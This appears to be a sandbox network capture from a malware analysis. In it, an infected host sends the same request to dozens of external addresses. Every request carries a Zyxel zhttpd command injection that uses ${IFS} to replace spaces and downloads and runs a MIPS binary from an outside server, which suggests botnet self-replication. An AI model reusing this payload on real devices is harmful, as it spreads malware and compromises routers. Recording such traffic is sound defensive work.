                                                Jan 12, 2024 18:16:39.834161997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8531192.168.2.233904864.88.208.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834178925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8532192.168.2.2358822197.235.36.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834228039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8533192.168.2.2355696118.10.235.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834290028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8534192.168.2.2343520140.195.147.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834315062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8535192.168.2.2356450199.90.199.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834350109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8536192.168.2.2355136203.149.25.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834379911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8537192.168.2.2336396165.50.31.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834420919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8538192.168.2.2359806202.169.109.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834450006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8539192.168.2.2357010118.57.65.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834477901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8540192.168.2.234563886.81.183.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834517002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8541192.168.2.235310641.24.31.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834572077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8542192.168.2.2343648183.160.166.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834613085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8543192.168.2.234382620.191.247.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834644079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8544192.168.2.233278838.175.36.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834692001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8545192.168.2.234333079.19.123.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834718943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8546192.168.2.2336014181.234.68.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834744930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8547192.168.2.235614614.176.212.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834793091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8548192.168.2.2359754119.51.153.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834820032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8549192.168.2.234180825.186.50.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834852934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8550192.168.2.2359410146.5.49.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834892035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8551192.168.2.235274425.40.45.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834930897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8552192.168.2.2336606210.108.63.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834971905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8553192.168.2.2341632111.239.7.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835007906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8554192.168.2.2352724103.162.189.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835050106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8555192.168.2.234051090.188.211.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835093021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8556192.168.2.235980468.224.106.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835150003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8557192.168.2.2338632219.10.107.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835172892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8558192.168.2.2342108160.220.238.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835213900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8559192.168.2.235412227.4.10.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835256100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8560192.168.2.2356600159.37.46.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835300922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8561192.168.2.2347336152.137.55.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835351944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8562192.168.2.2341858204.190.170.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835398912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8563192.168.2.2341654156.222.54.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835438967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8564192.168.2.2359526129.185.164.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835475922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8565192.168.2.2355676186.132.164.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835510015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8566192.168.2.2347140189.143.35.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835544109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8567192.168.2.234792246.206.59.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835613012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8568192.168.2.2339616160.239.22.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835628033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8569192.168.2.2339594163.76.111.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835652113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8570192.168.2.233589023.254.136.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835689068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8571192.168.2.236067852.145.123.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835722923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8572192.168.2.234653047.195.217.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835787058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8573192.168.2.235252039.89.15.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835829020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8574192.168.2.235738618.12.171.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835865021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8575192.168.2.235214077.240.45.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835906982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8576192.168.2.2347322106.178.43.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835947990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8577192.168.2.2336046211.70.35.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.835998058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8578192.168.2.2350000159.221.150.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836054087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8579192.168.2.2332912198.81.200.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836093903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8580192.168.2.2336052204.171.246.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836134911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8581192.168.2.235527824.66.183.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836159945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8582192.168.2.235178079.139.57.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836206913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8583192.168.2.2336588200.30.224.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836258888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8584192.168.2.234271067.139.241.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836266041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8585192.168.2.235785652.114.145.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836323977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8586192.168.2.2334370118.43.234.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836357117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8587192.168.2.235580475.213.177.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836390972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8588192.168.2.233318481.187.28.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836443901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8589192.168.2.233372236.95.246.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836494923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8590192.168.2.2355660179.110.43.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836538076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8591192.168.2.235142248.12.54.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836574078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8592192.168.2.2356610113.113.94.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836622000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8593192.168.2.2337178152.119.97.117443
                                                TimestampBytes transferredDirectionData
